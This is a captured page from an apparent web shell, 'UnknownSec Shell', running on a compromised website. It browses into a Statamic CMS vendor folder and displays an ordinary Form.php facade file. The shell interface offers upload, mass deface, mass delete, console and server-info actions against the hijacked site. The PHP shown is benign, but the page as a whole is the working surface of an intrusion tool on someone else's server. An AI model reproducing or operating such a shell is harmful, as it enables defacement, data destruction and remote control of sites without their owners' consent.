shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Facades
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Form.php
<?php namespace Statamic\Facades; use Illuminate\Support\Facades\Facade; use Statamic\Contracts\Forms\FormRepository; /** * @method static \Statamic\Contracts\Forms\Form find($handle) * @method static \Statamic\Contracts\Forms\Form findOrFail($handle) * @method static \Illuminate\Support\Collection all() * @method static \Statamic\Contracts\Forms\Form make($handle = null) * @method static array extraConfigFor($handle) * @method static void appendConfigFields($handle, $display, $fields) * * @see \Statamic\Contracts\Forms\FormRepository */ class Form extends Facade { protected static function getFacadeAccessor() { return FormRepository::class; } }
© 2026 UnknownSec